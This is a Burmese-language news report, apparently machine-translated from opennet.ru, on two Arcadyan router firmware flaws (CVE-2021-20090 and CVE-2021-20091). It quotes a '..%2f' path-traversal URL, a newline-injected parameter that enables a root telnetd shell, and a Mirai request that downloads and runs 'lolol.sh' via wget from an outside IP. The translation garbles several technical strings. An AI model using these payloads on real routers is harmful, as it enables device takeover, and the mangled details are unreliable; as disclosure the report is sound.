ထုတ်လုပ်သူ 17 ဦးအပေါ် သက်ရောက်မှုရှိသော အိမ်ရောက်ရောက်တာများတွင် အားနည်းချက်

Arcadyan ကုမ္ပဏီမှ firmware သည် HTTP ဆာဗာကိုအသုံးပြုသည့် firmware ကိုအသုံးပြုသည့် အိမ်ရောက်ရောက်တာများအပေါ် ကြီးမားသောတိုက်ခိုက်မှုကို ကွန်ရက်ပေါ်တွင် မှတ်တမ်းတင်ထားသည်။ စက်ပစ္စည်းများကို ထိန်းချုပ်နိုင်ရန်၊ root လုပ်ပိုင်ခွင့်ဖြင့် မတရားကုဒ်ကို အဝေးထိန်းစနစ်ဖြင့် လုပ်ဆောင်နိုင်စေမည့် အားနည်းချက်နှစ်ခုကို ပေါင်းစပ်အသုံးပြုထားသည်။ ပြဿနာသည် Arcadyan၊ ASUS နှင့် Buffalo တို့မှ ကျယ်ပြန့်သော ADSL router များအပြင် Beeline အမှတ်တံဆိပ်များအောက်တွင် ပံ့ပိုးပေးထားသည့် ကိရိယာများ (ပြဿနာကို Smart Box Flash တွင် အတည်ပြုထားသည်)၊ Deutsche Telekom၊ Orange၊ O2၊ Telus၊ Verizon၊ Vodafone နှင့် အခြားဆက်သွယ်ရေးအော်ပရေတာများ။ ပြဿနာသည် Arcadyan firmware တွင် 10 နှစ်ကျော်ကြာရှိနေပြီဖြစ်ပြီး ဤအချိန်အတွင်း မတူညီသောထုတ်လုပ်သူ 20 ခုမှ အနည်းဆုံး စက်ပစ္စည်းမော်ဒယ် 17 သို့ ရွှေ့ပြောင်းနိုင်ခဲ့ကြောင်း မှတ်သားရပါသည်။

ပထမဆုံး အားနည်းချက်၊ CVE-2021-20090 သည် အထောက်အထားမခိုင်လုံဘဲ မည်သည့် web interface script ကိုမဆို ဝင်ရောက်ကြည့်ရှုနိုင်စေသည်။ အားနည်းချက်၏ အနှစ်သာရမှာ ဝဘ်အင်တာဖေ့စ်တွင်၊ ပုံများ၊ CSS ဖိုင်များနှင့် JavaScript script များကို အထောက်အထားမခိုင်လုံဘဲ ပေးပို့နိုင်သည့် လမ်းညွှန်ချက်အချို့ဖြစ်သည်။ ဤကိစ္စတွင်၊ အထောက်အထားမခိုင်လုံဘဲ ဝင်ရောက်ခွင့်ရှိသော လမ်းညွှန်များကို ကနဦးမျက်နှာဖုံးကို အသုံးပြု၍ စစ်ဆေးသည်။ ပင်မလမ်းညွှန်သို့သွားရန် လမ်းကြောင်းများရှိ “../” ဇာတ်ကောင်များကို ဖာမ်းဝဲလ်က ပိတ်ဆို့ထားသော်လည်း “..%2f” ပေါင်းစပ်မှုကို အသုံးပြု၍ ကျော်သွားပါသည်။ ထို့ကြောင့် “http://192.168.1.1/images/..%2findex.htm” ကဲ့သို့ တောင်းဆိုမှုများ ပေးပို့သည့်အခါ ကာကွယ်ထားသော စာမျက်နှာများကို ဖွင့်နိုင်သည်။

ဒုတိယအားနည်းချက်၊ CVE-2021-20091 သည် စစ်မှန်သောအသုံးပြုသူတစ်ဦးအား ကန့်သတ်ချက်များအတွင်း လိုင်းစာလုံးအသစ်တစ်ခုပါဝင်မှုကို စစ်ဆေးခြင်းမရှိသည့် အထူးဖော်မတ်သတ်မှတ်ထားသောဘောင်များကို apply_abstract.cgi script သို့ပေးပို့ခြင်းဖြင့် စက်ပစ္စည်း၏စနစ်ဆက်တင်များကို ပြောင်းလဲမှုများပြုလုပ်နိုင်စေပါသည်။ . ဥပမာအားဖြင့်၊ ping လုပ်ဆောင်ချက်ကို လုပ်ဆောင်သည့်အခါ၊ တိုက်ခိုက်သူတစ်ဦးသည် IP လိပ်စာကို အမှန်ခြစ်ထားသည့် အကွက်တွင် တန်ဖိုး “192.168.1.2%0AARC_SYS_TelnetdEnable=1” ကို သတ်မှတ်နိုင်ပြီး ဆက်တင်ဖိုင်ကို ဖန်တီးသည့်အခါ /tmp/etc/config/ တို့ကို သတ်မှတ်နိုင်သည်။ .glbcfg၊ သည် “AARC_SYS_TelnetdEnable=1” ဟူသော စာကြောင်းကို အမြစ်ရပိုင်ခွင့်များနှင့် ကန့်သတ်မထားသော command shell ဝင်ရောက်ခွင့်ကို ပံ့ပိုးပေးသည့် telnetd ဆာဗာကို အသက်သွင်းပေးသည့် “AARC_SYS_TelnetdEnable=2” ဟူသော စာကြောင်းကို ရေးပါမည်။ အလားတူ၊ AARC_SYS ကန့်သတ်ဘောင်ကို သတ်မှတ်ခြင်းဖြင့်၊ သင်သည် စနစ်ပေါ်ရှိ မည်သည့်ကုဒ်ကိုမဆို လုပ်ဆောင်နိုင်သည်။ ပထမအားနည်းချက်က ၎င်းကို “/images/..%XNUMXfapply_abstract.cgi” အဖြစ်ဝင်ရောက်ခြင်းဖြင့် စစ်မှန်ကြောင်းအထောက်အထားမရှိဘဲ ပြဿနာရှိသော script ကို run နိုင်စေပါသည်။

အားနည်းချက်များကို အသုံးချရန်၊ တိုက်ခိုက်သူသည် ဝဘ်အင်တာဖေ့စ် လုပ်ဆောင်နေသည့် ကွန်ရက်အပေါက်သို့ တောင်းဆိုချက်တစ်ခု ပေးပို့နိုင်ရပါမည်။ တိုက်ခိုက်မှုပြန့်ပွားမှု၏ ဒိုင်နနမစ်ကို အကဲဖြတ်ရာတွင် ပံ့ပိုးကူညီမှုဝန်ဆောင်မှုဖြင့် ပြဿနာများကို ရိုးရှင်းလွယ်ကူစေရန်အတွက် အော်ပရေတာများစွာသည် ၎င်းတို့၏စက်ပစ္စည်းများကို ပြင်ပကွန်ရက်မှ ဝင်ရောက်ခွင့်ကို ချန်ထားခဲ့ကြပါသည်။ အင်တာဖေ့စ်သို့ဝင်ရောက်ခွင့်ကို အတွင်းကွန်ရက်တွင်သာ ကန့်သတ်ထားပါက၊ “DNS rebinding” နည်းပညာကို အသုံးပြု၍ ပြင်ပကွန်ရက်တစ်ခုမှ တိုက်ခိုက်မှုကို လုပ်ဆောင်နိုင်သည်။ Mirai botnet သို့ router များကို ချိတ်ဆက်ရန် အားနည်းချက်များကို တက်ကြွစွာ အသုံးပြုနေပြီဖြစ်သည်- POST /images/..%2fapply_abstract.cgi HTTP/1.1 ချိတ်ဆက်မှု- အသုံးပြုသူ-အေးဂျင့်ကို ပိတ်ပါ- Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping212.192.241.7 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

source: opennet.ru

မှတ်ချက် Add